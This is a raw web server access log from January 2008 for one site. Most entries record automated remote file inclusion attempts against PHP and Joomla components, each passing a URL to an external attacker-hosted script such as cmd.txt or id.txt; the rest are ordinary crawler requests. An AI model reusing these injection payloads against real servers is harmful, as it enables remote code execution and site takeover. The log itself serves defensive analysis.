202.60.74.190 - - [23/Jan/2008:05:24:10 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [23/Jan/2008:05:24:11 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [23/Jan/2008:05:24:11 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:24:56 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:24:57 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:25:00 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 31402 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:25:17 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:25:18 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:25:20 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 32050 "-" "libwww-perl/5.805" "www.dmulk.com"
72.38.10.218 - - [23/Jan/2008:05:27:14 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [23/Jan/2008:05:27:15 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.38.10.218 - - [23/Jan/2008:05:27:15 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.156 - - [23/Jan/2008:05:27:43 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.197.30.62 - - [23/Jan/2008:05:29:20 -0800] "GET //?mosConfig_faviconhttp://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
213.197.30.62 - - [23/Jan/2008:05:29:21 -0800] "GET //?mosConfig_favicon=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [23/Jan/2008:05:29:23 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:31:04 -0800] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:31:04 -0800] "GET /////index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.23.162 - - [23/Jan/2008:05:31:26 -0800] "GET /bikes/dteel/?D=A HTTP/1.0" 200 8528 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:05:35:43 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:05:35:44 -0800] "GET /admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:05:35:44 -0800] "GET /logs/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.219 - - [23/Jan/2008:05:36:06 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:05:36:57 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [23/Jan/2008:05:37:16 -0800] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [23/Jan/2008:05:37:16 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [23/Jan/2008:05:37:17 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:38:08 -0800] "GET /logs//modules/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:38:08 -0800] "GET //modules/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.193.240.89 - - [23/Jan/2008:05:39:46 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.141.173.75 - - [23/Jan/2008:05:41:00 -0800] "GET //modules/public/displayCategory.php?basepath=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [23/Jan/2008:05:41:02 -0800] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [23/Jan/2008:05:41:02 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:05:41:28 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:05:41:29 -0800] "GET /modules/My_eGallery/index.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:05:41:29 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.167.234 - - [23/Jan/2008:05:41:38 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nedaleko.ru/en/.%20/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
71.6.167.234 - - [23/Jan/2008:05:41:39 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.nedaleko.ru/en/.%20/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.10.138.76 - - [23/Jan/2008:05:41:44 -0800] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [23/Jan/2008:05:41:44 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.236.230.52 - - [23/Jan/2008:05:42:00 -0800] "GET //modules/public/displayCategory.php?basepath=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [23/Jan/2008:05:42:46 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [23/Jan/2008:05:43:26 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.240.89 - - [23/Jan/2008:05:46:00 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:52:05 -0800] "GET /logs//modules/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.146.151.22 - - [23/Jan/2008:05:54:22 -0800] "GET /db.php?commonpath=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:58:52 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [23/Jan/2008:06:00:01 -0800] "GET /logs/access.log HTTP/1.0" 200 33893 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.206 - - [23/Jan/2008:06:05:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [23/Jan/2008:06:05:31 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:06:07:13 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.81 - - [23/Jan/2008:06:07:13 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.53.183.183 - - [23/Jan/2008:06:07:19 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:06:07:20 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [23/Jan/2008:06:07:45 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:06:09:08 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:06:09:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:06:09:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.79 - - [23/Jan/2008:06:12:00 -0800] "GET /megumi/?N=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:06:12:35 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:06:12:35 -0800] "GET /logs/access_071030.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:13:35 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:13:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:13:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:16 -0800] "GET /logs/access.log//modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:24 -0800] "GET //modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:28 -0800] "GET /logs/access.log//modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:30 -0800] "GET /logs//modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:34 -0800] "GET //modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [23/Jan/2008:06:14:36 -0800] "GET /logs//modules/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:06:16:19 -0800] "GET /megumi/ HTTP/1.1" 200 937 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:06:19:19 -0800] "GET /logs//login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:06:19:19 -0800] "GET //login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:06:22:56 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:06:22:56 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:06:22:59 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [23/Jan/2008:06:25:07 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.38.10.218 - - [23/Jan/2008:06:25:21 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:28:04 -0800] "GET /logs/access_071228.log/myevent.php?myevent_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:28:04 -0800] "GET /myevent.php?myevent_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:28:05 -0800] "GET /logs/myevent.php?myevent_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:36:43 -0800] "GET /logs/access.log//com_swmenupro/ImageManager/Classes/ImageManager.php=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:36:43 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:36:44 -0800] "GET /logs//com_swmenupro/ImageManager/Classes/ImageManager.php=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:36:48 -0800] "GET /logs/access_071224.log//com_swmenupro/ImageManager/Classes/ImageManager.php=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:06:36:55 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:06:36:56 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:06:36:56 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:38:00 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:38:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:06:38:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.103 - - [23/Jan/2008:06:38:20 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:40:34 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:40:35 -0800] "GET /config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:40:35 -0800] "GET /logs/config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:06:40:48 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:06:40:48 -0800] "GET //includes/kb_constants.php?module_root_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:06:40:59 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:06:41:00 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:43:37 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:43:37 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:43:37 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:44:36 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:44:36 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:06:44:37 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [23/Jan/2008:06:44:52 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [23/Jan/2008:06:44:52 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [23/Jan/2008:06:44:52 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:46:14 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:49:11 -0800] "GET /logs/access_071230.log/myevent.php?myevent_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:06:50:53 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:50:58 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:50:58 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:50:58 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:52:30 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.247.217.44 - - [23/Jan/2008:06:53:38 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.44 - - [23/Jan/2008:06:53:38 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:53:49 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:53:49 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:06:53:49 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:06:54:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:06:55:54 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:06:55:54 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
